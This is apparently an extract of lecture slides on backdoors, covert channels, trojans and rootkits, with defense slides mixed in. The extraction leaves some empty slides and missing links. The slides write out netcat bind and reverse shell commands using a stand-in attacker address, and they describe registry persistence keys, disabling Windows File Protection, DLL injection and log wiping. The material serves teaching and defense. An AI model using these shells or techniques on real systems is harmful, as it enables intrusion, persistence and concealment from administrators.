  • Registry keys start programs on login or reboot:
    • HKCR\Exefiles\Shell\Open\Command
      • Indicates programs that will be run every time another .exe is run.
starting backdoors automatically on windows132
Starting backdoors automatically on Windows
  • Use the task scheduler
    • Check scheduled tasks with autoruns from Sysinternals
starting backdoors automatically on unix
Starting backdoors automatically on Unix
  • Modifying the init daemon
  • Modifying system and service initialization scripts
  • Modify the internet daemon script
  • Change user startup scripts
  • Schedule jobs with Cron
starting backdoors automatically on unix134
Starting backdoors automatically on Unix
  • Modify the init daemon
    • init daemon is the first process to start.
    • uses /etc/inittab to find other processes that need to be started
    • attacker merely adds line to inittab.
starting backdoors automatically on unix135
Starting backdoors automatically on Unix
  • Modify system and service initialization scripts
    • About 20+ system scripts
      • Located in /etc/rc.d or /etc/init.d
    • Or merely plant a backdoor in an initialization script for another service.
      • E.g. ppp daemon
        • for PPP modem dial-up connections
    • inetd
      • network daemon
      • change /etc/inetd.conf
starting backdoors automatically on unix136
Starting backdoors automatically on Unix
  • Adjust user startup scripts
    • .login
    • .cshrc
    • /etc/profile
    • .logout
    • .xinitrc
    • .xsession
backdoor defenses
Backdoor Defenses
  • System integrity tools like tripwire
    • Apply to all resources
backdoor with netcat
Backdoor with netcat
  • netcat compiles into executable nc.
  • On the victim:
    • nc –l –p 2000 –e cmd.exe (Windows)
      • nc –l –p 2000 –e /bin/sh (Unix)
    • Sets up a listener on port 2000.
  • On the attacker:
    • nc [victim address] 2222
      • gives command shell.
backdoor with netcat140
Backdoor with netcat
  • Only works if attacker can establish a TCP connection to the port on the victim.
  • Firewalls can block this.
backdoor with netcat141
Backdoor with netcat
  • Use an open door in the firewall and initiate connection on the victim’s machine:
    • Shoveling a shell
      • On the attacker’s machine:
        • nc –l –p 80
          • netcat listener on port 80
      • On the victim’s machine:
        • nc [attacker’s address] 80 –e cmd.exe
        • initializes outgoing connection to attacker
        • then executes a shell
backdoor with netcat142
Alternatives to netcat









Backdoor with netcat
virtual network computing
Virtual Network Computing
  • Remote GUI tools
    • Virtual Network Computing (VNC)
    • Windows Terminal Services
    • Remote Desktop Service
    • Citrix MetaFrame
    • PCAnywhere
    • Dameware
    • Back Orifice 2000
    • SubSeven
virtual network computing144
Virtual Network Computing
  • VNC server allow to shovel a shell.
  • Can be remotely installed:
    • Attacker has remote shell access on victim
    • Attacker installs copy of VNC on his machine
    • Attacker exports the registry keys associated with VNC to the victim
    • Attacker moves four files to victim
    • Attacker adds registry changes to victim
      • This will display a VNC installation successful message on the victim
    • Attacker starts VNC
defenses against backdoor shell listeners
Defenses against Backdoor Shell Listeners
  • Use firewalls
    • Filter traffic in both directions.
    • Firewall individual machines.
  • Look for open ports.
    • On the network (Nmap)
    • Or with a trusted tool (on CD) locally.
  • Close unneeded ports.
backdoors without ports
Backdoors without ports
  • ICMP backdoor
    • ICMP messages don’t use ports.
    • Firewalls need to let some ICMP messages pass.
    • ICMP messages can carry a few bytes of payload.
backdoors without ports147
Backdoors without ports
  • ICMP backdoors:
    • Loki
    • 007shell
    • ICMP Tunnel
    • available at for free.
non promiscuous sniffing backdoors
Non-Promiscuous Sniffing Backdoors
  • Sniffer in non-promiscuous mode sniffs for commands in packets destined for the local machine.
non promiscuous sniffing backdoors149
Non-Promiscuous Sniffing Backdoors
  • Cd00r
    • sniffs for TCP packets to ports X, Y, Z
      • the ports are not open
    • syn packets to X, Y, Z: sniffer activates backdoor.
    • backdoor opens TCP port and shovels shell.
      • This can be detected.
      • Is however unnecessary with a sniffer
      • “Future releases” will discontinue this practice.
      • Just craft special packets instead.
    • when backdoor closes, port is closed.
promiscuous sniffing backdoors
Promiscuous Sniffing Backdoors
  • Promiscuous sniffer can gather packets send to any machine on the same LAN segment.
    • IP address of suspicious traffic does not have to originate on the victim machine.
promiscuous sniffing backdoors152
Promiscuous Sniffing Backdoors
  • Attacker has compromised the DSN server and installed a promiscuous sniffing backdoor there.
promiscuous sniffing backdoor
Promiscuous Sniffing Backdoor
  • Attacker sends a packet to the webserver at port 80.
  • Messages passes through the firewall.
promiscuous sniffing backdoor154
Promiscuous Sniffing Backdoor
  • Sniffer on the DSN server sniffs the package.
  • Webserver does not know what to do with a malformed request.


Message to webserver.

Let pass.

promiscuous sniffing backdoor155
Promiscuous Sniffing Backdoor
  • Backdoor on DSN reacts to packet.
  • Sends back message to attacker.
  • Spoofed return address from webserver.
  • Firewall lets it pass.


Message from webserver.

Let pass.

covert channels
Covert Channels
  • Covert Channels hide the fact that information passes through them.
    • Tunneling:
      • Protocol that carries data from another protocol.
        • Example: SSH
          • SSH allows to set up a secure connection between two computers.
          • Can use this connection for insecure protocols such as ftp.
          • SSH protects these insecure applications.
covert channels157
Covert Channels
  • Example: LOKI
    • Source: Phrack 51
    • Attacker install Loki server (a.k.a. LokiD) on victim.
    • Attacker runs Loki client on his own machine.
    • Loki tunnels attackers commands:
      • Attacker writes shell commands.
      • Loki client sends out several ICMP packets to victim that contain part of the commands.
      • Loki server receives ICMP packets and extracts attacker command.
      • Loki server executes them.
      • Reversely, Loki server wraps responses in ICMP messages, sends them to the Loki client, which displays them.
  • Port scanners or netstat cannot detect Loki since ICMP does not use ports.
  • Only traces are the Loki server running as root and ICMP messages going back and forth.
covert channels158
Covert Channels
  • Example: Reverse WWW Shell
    • Source:
    • Attacker needs to install the reverse WWW shell on victim’s machine
      • Program spawns a child every day at a specific time.
      • Executes a local shell and connects to www server owned by the attacker.
        • This looks to a firewall like an ordinary http request.
      • www server sends back html resources that the reverse shell interprets as shell commands.
        • After a delay of 60 seconds in order to avoid exposure.
covert channels159
Covert Channels
  • Example: GoToMyPC
    • Commercial, remote control tool that uses reverse WWW shell technology.
    • Security depends on authentication strength (password).
covert channels160
Covert Channels
  • Tunnel through any TCP / IP traffic
    • Insert data in unused or misused fields in the protocol header of packets, such as:
      • IP Identification.
      • TCP sequence number.
      • TCP acknowledgment number.
covert channels161
Covert Channels
  • Tunnel through any TCP / IP traffic
    • Insert data in unused or misused fields in the protocol header of packets, such as:
      • Sequence Number.
        • Can even be used with bouncing:

Bounce Server

1. Client generate TCP SYN packet with spoofed source address of bounce server.

Sequence number is set to one less than the ASCII code of the character to be transmitted.

covert channels162
Covert Channels
  • Tunnel through any TCP / IP traffic
    • Insert data in unused or misused fields in the protocol header of packets, such as:
      • Sequence Number.
        • Can even be used with bouncing:

Bounce Server

2. Bounce Server answers with an ACK and SYN. The ACK contains the Sequence Number of the first packet increased by one.


covert channels163
Covert Channels
  • Tunnel through any TCP / IP traffic
    • Insert data in unused or misused fields in the protocol header of packets, such as:
      • Sequence Number.
        • Can even be used with bouncing:

Bounce Server

2. Receiver sends back a SYN/ACK or RESET, obtains the character from the Sequence Number field (now the correct character).


defenses against backdoors without ports
Defenses against backdoors without ports
  • Backdoors still create running processes.
  • Backdoors still create network packets.
  • Backdoors might put MAC cards into promiscuous mode.
trojan horses
Trojan Horses

a program with added functionality.

trojan horses166
Trojan Horses
  • Hiding names
    • change name (of netcat, vnc, ...)
    • play with windows suffixes
      • just_text.txt .exe
        • This is ONE word with a bunch of spaces in it
      • Use the .shs suffix (suppressed by system)
        • just_text.txt .shs
        • Shell scrap object
      • Windows uses the suffix to decide what to do with a file.
trojan horses167
Trojan Horses
  • Hiding names
    • take someone else’s name.
      • overeager system administrators might even remove the legitimate program thinking it might be your fake program.
      • windows does not let you kill program with certain names.
        • regardless of content
        • csrss.exe, services.exe, smss.exe, System, System Idle Process, winlogon.exe
        • There might be more than one legitimate process named winlogon or csrcc.exe
trojan horses168
Trojan Horses
  • Hiding names
    • use common typos of important files for a Trojan
    • ifconfig instead of ipconfig.
trojan horses defenses
Trojan Horses Defenses
  • Pskill will kill any horse / process.
  • Fport and lsof will find open ports associated with the horse.
  • Tripwire could find substitutes for executables.
  • Filter email attachments that are executable.
  • Wrap malware in a good program.
    • A.k.a. binders, packers, exe binders, exe joiners.
      • AFX File Lace, Elite Wrap, Exe2vbs, PE Bundle, Perl2Exe, Saran Wrap, TOPV4, Trojan Man
  • Combat with
    • Anti-virus software
    • File System Integrity checkers (Tripwire)
    • Posted MD5, SHA1 values of downloads
definition of rootkit
Definition of Rootkit


Rootkits are Trojan horse backdoor tools that modify existing operating system software so that an attacker can keep access to and hide on a machine.

unix user mode rootkits
Unix User Mode Rootkits
  • Rootkits are bundled packages consisting of:
    • Binary replacements that provide backdoor access.
    • Binary replacements that hide the attacker.
    • Other tools for hiding
    • Additional Odds and Ends
    • Installation Script
unix user mode rootkits lrk
Unix User Mode Rootkits: LRK
  • Around since the early nineties.
  • version 6 is appearing.
unix user mode rootkits lrk174
Unix User Mode Rootkits: LRK
  • Backdoor Access:
    • Trojan login, rsh, ssh
      • Altered login, rshd, sshd
      • Same functionality, but with a special backdoor password for “rewt” that gives root access.
    • Remote shell on a chosen port
      • altered inetd, tcpd
    • Local privilege escalation backdoors:
      • chfn, chsn, passwd, su
unix user mode rootkits lrk175
Unix User Mode Rootkits: LRK
  • Binary Replacements that hide the attacker:
    • Processes
      • ps
      • top
      • pidof
      • killall
      • crontab
unix user mode rootkits lrk176
Unix User Mode Rootkits: LRK
  • Network use
    • netstat
    • ifconfig
  • Files
    • ls
    • find
    • du (omits space taken by hidden files
  • Events
    • syslogd
unix user mode rootkits lrk177
Unix User Mode Rootkits: LRK
  • Other tools for hiding:
    • fix
      • resets the MAC times of trojaned system files.
      • pads files so that the CRC check matches the one of the original files.
    • zap2, wtmp
      • blanks out / edits information in important files:
        • utmp, wtmp
          • stores data on users currently / ever logged in.
        • btmp
          • stores data on bad logins.
        • lastlog
          • stores data on last login for users
unix user mode rootkits lrk178
Unix User Mode Rootkits: LRK
  • Goodies
    • bindshell
      • creates a backdoor listener
      • attacker connects with netcat to the listener
    • sniffer
      • linsniffer grabs IDs and passwords for ftp, telnet
unix user mode rootkits lrk179
Unix User Mode Rootkits: LRK
  • LRK Installation Script
    • makefile allows to choose configuration
  • No need to understand any of the workings of LRK
    • installs in seconds / few minutes
unix user mode rootkits urk
Unix User Mode Rootkits: URK
  • Universal Root Kit
    • Functions on a variety of Unix variants
    • Has slightly less functionality than LRK
efs2 manipulations to hide data
EFS2 Manipulations to hide data
  • RunEFS, Defiler’s toolkit foil computer forensics investigations on a UNIX machine.
  • RunEFS
    • adds pointers of good blocks to the bad blocks inodes.
    • stores data in them.
    • Coroner’s Toolkit and derivatives don’t look at these blocks.
efs2 manipulations to hide data182
EFS2 Manipulations to hide data
  • Defiler’s toolkit destroys data that a forensics tool can harvest.
    • shred and other overwrite tools destroy data in a block.
    • Defiler’s toolkit destorys inode and directory information as well.
      • Necrofile scrubs inodes clean
      • Klismafile overwrites directory entries associated with deleted files.
        • This leaves blank spots in a directory.
        • This shows that someone used Klismafile.
windows user mode rootkits
Windows User Mode Rootkits
  • Windows File Protection (WFP)
    • Scans for changes to critical executables and libraries.
      • Compares digital signatures of 1700 files to a protected file
    • If WFP detects a change it searches for an authorized file in different locations.
    • WFP can be altered
      • Windows Service Pack Installations (Update.exe)
      • Hotfix distributions (Hotfix.exe)
      • Windows Update Feature
      • Windows Device Installer
windows user mode rootkits184
Windows User Mode Rootkits
  • Implementing user mode rootkits in windows:
    • Use existing interfaces
    • Overwrite file
    • Use DLL injection and API hooking to manipulate running processes in memory.
windows user mode rootkits185
Windows User Mode Rootkits
  • Use existing interfaces: FakeGINA
    • sits between winlogon and msgina
windows user mode rootkits186
Windows User Mode Rootkits:
  • Windows uses Graphical Identification aNd Authentication (GINA)
    • Windows allows system administrators to install third party GINA tools.
      • Windows ships with default GINA (msgina.dll)
    • Attacker sets registry key
      • HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon
    • to install Fakegina
      • Fakegina gathers passwords, passes logon credentials to the real msgina.dll.
windows user mode rootkits changing files
Windows User Mode Rootkits: Changing Files
  • Not so easy, since WFP protects system files
  • Changing WFP Settings
    • WFP configuration is stored in the registry
  • Attacker can change system file and then
    • delete the version in DLL cache.
      • WFP cannot find a correct version.
      • Sends message to request system CD.
      • Administrator might ignore message
windows user mode rootkits188
Windows User Mode Rootkits
  • Attacker can
    • Alter the location of the Dllcache by modifying the registry.
      • WFP checks signatures and finds many mistakes.
      • Log is full of warnings.
    • Turn off WFP by changing a registry key
      • WFP still active until reboot.
      • Warning message after reboot.
windows user mode rootkits189
Windows User Mode Rootkits
  • Attacker can
    • set the SFCDisable key to value 0xFFFFFF9D.
      • Completely disables WFP on Win2000
      • No dialog warning
      • Only a message that WFP is inactive.
  • Code Red II used method 4.
windows user mode rootkits190
Windows User Mode Rootkits
  • In order to achieve stealth mode, the rootkit must alter the execution path of the OS or change the data structures directly.
  • Altering the execution path with HOOKS:
windows user mode rootkits191
Windows User Mode Rootkits
  • Assume that user process lists a directory.
  • This involves calling various dll at the user and at root level.
windows user mode rootkits api hooking
Windows User Mode RootkitsAPI HOOKING
  • The application will load kernel32.dll into its private address space.
    • Between memory addresses 0x00010000 and 0x7FFE0000.
  • Rootkit needs to overwrite any function in Kernel32.dll.
  • This is called API HOOKING
windows user mode rootkits193
Windows User Mode Rootkits
  • API HOOKING Method 1:
    • Import Address Table Hooking
      • Most applications that use the Win32 API use an Import Address Table.
      • Each DLL is contained in the application’s image in the file system in a structure called the IMAGE_IMPORT_DESCRIPTOR
      • When the OS loads the application, it parses the IMAGE_IMPORT_DESCRIPTOR structure and loads each required DLL into the application’s memory.
      • Once the DLL is mapped, the OS locates each imported function in memory and overwrites an array with that address.
windows user mode rootkits194
Windows User Mode Rootkits
  • API HOOKING Method 1:
    • Import Address Table Hooking
      • Rootkit needs to be installed in application’s memory.
      • Reset one of these pointers to the rootkit code.
windows user mode rootkits195
Windows User Mode Rootkits
  • API HOOKING Method 2:
    • Inline Hooking
      • Replace code of functions in a DLL.
        • Replace first 5 bytes of function with a jump to your rootkit code.
        • Save the overwritten bytes in a “trampoline”
        • Rootkit executes the trampoline and then calls the target function
        • Target function eventually returns to rootkit.
        • Rootkit edits return values.
        • Rootkit passes the return values on to the calling function.
windows user mode rootkits196
Windows User Mode Rootkits
  • DLL Injection
    • forces an exe process to accept a DLL it never requested.
    • This is a method to get a rootkit into a target application.
    • As always, assumes that the attacker has complete access to the system.
windows user mode rootkits197
Windows User Mode Rootkits
  • DLL Injection
    • forces an exe process to accept a DLL it never requested.
      • Allocate space in victim process for the DLL code to occupy. (VirtualAllocEx)
      • Allocate space in victim process for the DLL parameters. (VirtualAllocEx)
      • Write name and code into the memory space of the victim process. (WriteProcessMemory)
      • Create a thread in the victim process (CreateRemoteThread)
      • Free up resources in the victim process after execution is complete.
windows user mode rootkits198
Windows User Mode Rootkits
  • DLL Injection
    • forces an exe process to accept a DLL it never requested.
      • Use of registry:
        • Windows NT/2000/XP/2003 has a registry key HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Windows\AppInit_DLLs
        • Rootkit can set the value of this key to a DLL of its own that modifies target process’ IAT.
windows user mode rootkits199
Windows User Mode Rootkits
  • DLL Injection allows to hijack any process
    • Attacker must have Debug Programs right on system.
  • Attacker uses DLL injection by
    • modifying a running dll that displays information on the screen.
    • Modified dll still calls original dll.
    • But does not display all the data.
windows user mode rootkits200
Windows User Mode Rootkits
  • AFX Windows RootKit
    • Attacker uses afx windows rootkit configuration console to generate code on his machine.
    • Then executes it on the victim’s machine.
  • AFX WinRK
    • installs itself in the System32 directory.
    • Creates iexplore.dll and explorer.dll
    • injects explorer.dll and iexplore.dll into explorer.exe
      • That process displays the GUI to users.
    • hides network connections, files, ...
user level rootkit defenses
User Level Rootkit Defenses
  • Preventing Root Kits
    • Harden systems and apply patches.
  • Detect Root Kits
    • File Integrity Checking (Signatures)
    • Root Kit Identification
      • Look for specific changes made in most root kits
      • chkrootkit for Unix
kernel mode rootkits
Kernel Mode Rootkits
  • Kernel Functions
    • Process and Thread
    • Interprocess Communication
    • Memory
    • File System
    • Hardware
    • Interrupts
kernel mode rootkits203
Kernel Mode Rootkits
  • Kernel
    • Relies on hardware level protection
      • Ring 0 vs. Ring 3 for Intel CPU
    • Prevents user processes from accessing critical kernel data structures.
kernel mode rootkit
Kernel Mode Rootkit
  • Processes running in kernel mode belong to the kernel.
  • Administrator, root only invoke user mode processes.
    • These processes access the kernel.
    • Change in kernel changes behavior of all processes.
kernel mode rootkit205
Kernel Mode Rootkit
  • Kernel Mode Rootkit Capabilities
    • File & Directory Hiding
    • Process Hiding
    • Network Port Hiding
    • Promiscuous Mode Hiding
    • Execution Redirection
    • Device Interception and Control
kernel mode rootkit206
Kernel Mode Rootkit
  • Advantages over User Level Rootkit:
    • Changes all programs that try to discover something from the kernel.
    • Statically linked binary forensic tools no longer work
linux kernel
Linux Kernel
  • Linux allows us to look at many internal kernel structures:
    • /proc
      • Slash proc
      • Virtual directory, lives only in memory.
      • Lots of commands just grab info from /proc.
      • We can write to certain areas of /proc such as /proc/net
linux kernel208
Linux Kernel
  • /proc
    • /cpuinfo
    • /devices
    • /ksmg
      • Log messages from kernel
    • /ksyms
      • List of all variables and functions that are exported via loadable kernel modules on the machine
linux kernel209
Linux Kernel
  • /proc
    • /net
    • /stat
      • Statistics such as data about CPU, virtual memory, hard drive usage
    • /sys
      • Kernel variables.
    • /version
linux kernel210
Linux Kernel
  • /dev
    • Contains pointers to various devices.
    • /dev/kmem
      • Image of the running kernel’s memory
    • /dev/mem
      • Image of all the memory

Gibberish without special tools

linux kernel211
Linux Kernel
  • User mode processes use System Calls to access kernel.
    • Embedded in the systems libraries:
      • SYS_open
      • SYS_read
      • SYS_write
      • SYS_execve
      • SYS_setuid
      • SYS_get_kernel_syms
      • SYS_query_module
linux kernel212
Linux Kernel
  • Located in
    • /usr/include/sys/syscall.h
    • /usr/include/bits/syscall.h
    • /usr/include/asm/unistd.h
    • Or similar locations.
linux kernel213
Linux Kernel
  • System Call Table:
    • Array maintained by the kernel that maps individual system call names and numbers.
    • Located also in memory.
    • On harddrive:
      • “less /boot/”
  • Use strace to find the system calls made by a command:
    • “strace ls”
linux kernel manipulations
Linux Kernel Manipulations
  • Loadable Kernel Modules
    • Legitimate Linux / Solaris kernel feature
      • Add support for new hardware
      • Can replace existing kernel features without system reboot.
linux kernel manipulations216
Linux Kernel Manipulations
  • Attacker uses insmod to
    • Alter System Call Table.
    • Load Kernel module.
linux kernel manipulations217
Linux Kernel Manipulations
  • Evil kernel module alters SYS_execve Looks at calling process.
    • If process is for a program that attacker wants to redirect
      • Evil kernel module actually calls another program.
    • Attacker can wrap the true SYS_execve code.
      • Makes it easy to generate the altered version of SYS_execve.
    • This alteration defeats file integrity checking tools.
      • SYS_execve code is still there, only
        • Never called.
        • Called if not interfering with attacker (if wrapped).
      • True login function, true sshd, true … not called, but replacements are.
linux kernel manipulations218
Linux Kernel Manipulations
  • Loadable kernel modules do not survive a system reboot.
  • Attacker alters programs in the boot process.
    • init
    • Once inserted, loadable kernel module hides changes to the altered boot process
linux kernel manipulations219
Linux Kernel Manipulations
  • Mighty Adore
    • Loadable kernel module
    • Adore interface: Ava.
  • Kernel Intrusion System (KIS)
    • Comes with slick GUI
linux kernel manipulations220
Linux Kernel Manipulations
  • Alternative to Loadable Kernel Module
  • Use /dev/kmem
    • Attackers can use tools that read and write to kernel memory image.
    • Attacker can insert alternative code for system calls.
    • Attacker can change the System Call Table.
linux kernel manipulations221
Linux Kernel Manipulations
  • Patching Kernel Image File
    • Simplest way:
      • Attacker “patches” vmlinuz file.
        • Contains the kernel image.
linux kernel manipulations222
Linux Kernel Manipulations
  • User Mode Linux (UML)
    • UML at
    • Runs entire Linux kernel inside a normal user-mode process.
    • Like VMWare, creates virtual environment.
    • Sysads, users are running in this virtual environment.
linux kernel manipulations223
Linux Kernel Manipulations
  • Kernel Mode Linux Project
    • Allows certain user processes to run in kernel mode.
    • Attacker patches kernel with KML.
    • Attacker now has processes that run in kernel mode.
      • Writes code to alter system call table and system call code.
defending the linux kernel
Defending the Linux Kernel
  • Prevention
    • Deny superuser access to attackers.
    • Patch quickly.
    • Change kernel so that it no longer allows loadable kernel modules.
      • Redhat 8.0, Redhat 9.0, Linux 2.5.41
    • Install Systrace to track and limit systems calls.
    • Use Linux Security Module in your kernel.
defending the linux kernel225
Defending the Linux Kernel
  • Kernel Mode RootKit Detection
    • Look for suspicious network activity
    • File Integrity Checkers (to catch the not quite good enough hacker).
    • Use systrace to follow system calls made by an application.
      • (free tool).
    • chkrootkit
      • Looks for system anomalies.
        • Each directory has a link count. Link count should be equal to the number of files + 2.
defending the linux kernel226
Defending the Linux Kernel
  • Kernel Mode RootKit Detection
    • Kernel Security Therapy Anti-Trolls (Linux 2.4)
      • Looks for changes to the system call table.
      • Scans /dev/kmem
      • Looks for memory locations of system calls and compares with
      • Creates fingerprints of system calls and various critical programs.
defending the linux kernel227
Defending the Linux Kernel
  • Kernel Mode RootKit Detection
    • Syscall Sentry
      • Loadable kernel module.
      • Checks for modules that alter the system table.
      • Alerts system administrator in this case.
    • Rootkit Hunter
      • Similar to Chkrootkit
    • Rootkit Revealer (windows) by Russinovich
    • Blacklight (windows) F-secure
defending the linux kernel228
Defending the Linux Kernel
  • Investigating potentially rootkitted systems:
    • Boot from a trusted CD
      • Helix, Knoppix, …
        • Boot a small linux OS
        • Contain Windows forensics tools.
windows kernel
Windows Kernel
  • User process calls DLL
    • DLL can
      • return to user process.
      • Go to csrss.exe (client server runtime)
      • Require kernel function
windows kernel230
Windows Kernel
  • User process makes call to ReadFile
  • Win32 Subsytem DLL makes call to NtReadFile in Ntdll.dll
    • Ntdll.dll translates well-documented API into rather obscure ones (that can be easily changed.)
  • Ntdll.dll makes a call to the Executive.
    • Executive sits inside ntoskrnl.exe
    • Determines which piece of kernel code is needed to handle request.
  • Kernel code interacts with hardware (disk).
  • Uses Hardware Abstraction Layer (HAL.dll).
windows kernel231
Windows Kernel
  • Ntdll.dll call into kernel:
    • System service dispatching.
      • Essentially a system call.
    • Uses the System Service Dispatch Table.
      • Table indicates where the appropriate system service code is located within the kernel.
windows kernel233
Windows Kernel
  • Fewer tools allow us to look at kernel structures.
windows kernel tools
Windows Kernel: Tools
  • Ctrl + Alt + Del
    • Task Manager Process Table
windows kernel tools235
Windows Kernel: Tools
  • System Idle Process PID 0
    • Just accounts for idle CPU time, not a real process.
  • System Process with PID 8
    • Contains data on all running threads in kernel mode.
  • Smss.exe (Session Manager)
    • First user mode process running on the machine.
    • Activated by kernel during system boot.
    • Analogous to the Unix Init Daemon.
windows kernel tools236
Windows Kernel: Tools
  • Csrss.exe
    • Process that manages the Win32 system.
    • Initiated by Smss.exe.
  • Winlogon.exe
    • Let’s users log on to the system.
  • Smss.exe, CSrss.exe, Winlogon.exe are the first processes after boot to run in user mode.
windows kernel tools237
Windows Kernel: Tools
  • Start  Control Panel  Administrative Tools  Performance
    • Click “+” and check process

Kernel (red line) is using up time.

windows kernel tools238
Windows Kernel: Tools

Process Explorer

Shows every running process.

Displays process hierarchy.

windows kernel tools239
Windows Kernel: Tools
  • DependencyWalker (

Traces relationship between user processes and the user-mode DLLs.

Allows us to see when the kernel is invoked.

manipulating windows kernel
Manipulating Windows Kernel
  • Same basic strategies as in Linux:
    • Evil Device Driver.
      • Corresponds to Loadable Kernel Module
    • Alter running kernel in memory.
    • Overwrite kernel image on file.
    • Deploy kernel on a virtual system.
    • Run user-mode code at kernel level.
manipulating windows kernel241
Manipulating Windows Kernel
  • Evil Device Driver
    • Alters system service call handling by loading a device driver.
    • Replaces or alters kernel functions.
    • Needs administrator privileges.
    • Needs to get evil code to run:
      • Overwrite existing kernel functionality
      • Alter system service dispatch table to point to new code.
      • Alter System Service Dispatcher.
manipulating windows kernel243
Manipulating Windows Kernel
  • If a Windows administrator installs a device driver, Windows will check for a valid digital signature.
  • Attacker with root privileges just accepts the warning.
manipulating windows kernel244
Manipulating Windows Kernel
  • Various alternatives to get evil device driver to run:
    • Evil driver can overwrite kernel.
      • Driver replaces existing code.
    • Evil driver implements various kernel functions and then changes the system dispatch table.
    • “Interrupt hooking” changes how the kernel handles CPU interrupts.
manipulating windows kernel245
Manipulating Windows Kernel
  • Altering a Running Kernel in Memory
    • Instead of a device driver, directly change the kernel code in memory.
manipulating windows kernel246
Manipulating Windows Kernel
  • Altering a Running Kernel in Memory:
    • Windows uses the Global Descriptor Table (GDT) to manage memory.
      • GDT stores division into various segments.
      • Store segment accessibility by ring 0/3.
    • Unfortunately, attacker can add a memory segment to the GDT.
      • Greg Hoglund Phrak 55
      • Explains how to bypass Security Monitor.
      • Add memory segment from location 0x00000000 to 0xffffffff.
      • This gives memory access to all user processes!
manipulating windows kernel248
Manipulating Windows Kernel
  • Altering a Running Kernel in Memory:
    • Alternatively, manipulate \Device\PhysicalMemory object.
    • Alternatively, use PhysMem from
  • Attacker can now change system functionality.
manipulating windows kernel249
Manipulating Windows Kernel
  • Patching the Kernel on the Hard Drive
    • Not as easy as it sounds.
    • System boot checks integrity of Ntoskrnl.exe.
      • Thus, not possible to only change the kernel file.
      • Have to change both the integrity checker and the kernel.
      • Integrity checker sits in NTLDR.
        • Attack: Change one instruction to jump over the integrity check.
        • Currently, not heavily used.
manipulating windows kernel250
Manipulating Windows Kernel
  • Patching the Kernel on the Hard Drive
    • Patch first NTLDR to disable integrity check.
    • Then patch Ntoskrnl.exe to disable security access check.
    • Now introduce rootkit.
manipulating windows kernel251
Manipulating Windows Kernel
  • Create a fake system using a virtual machine.
    • Variety of Virtual Machines
      • VMWare Virtual PC
      • Plex86 Bochs
    • But need to hide start-up message.
    • Unlike Linux, that is difficult.
protecting the windows kernel
Protecting the Windows Kernel
  • Prevent access to the machine.
  • Detect a rootkit:
    • Antivirus tools recognize most rootkit files before installation.
    • Some rootkits can be spotted afterwards.
      • Because developers were careless.
    • File Integrity Checkers
protecting the windows kernel253
Protecting the Windows Kernel
  • Removing Rootkits
    • Analyze system without invoking the kernel.
    • Use a FIRE or Knoppix bootable CD-ROM and look at the hard drive.
      • Registry / File System.
next generation malware
Next Generation Malware
  • BIOS
    • Malware active before booting from a device.
    • Bioscentral website for tools to look at BIOS.
  • Microkernel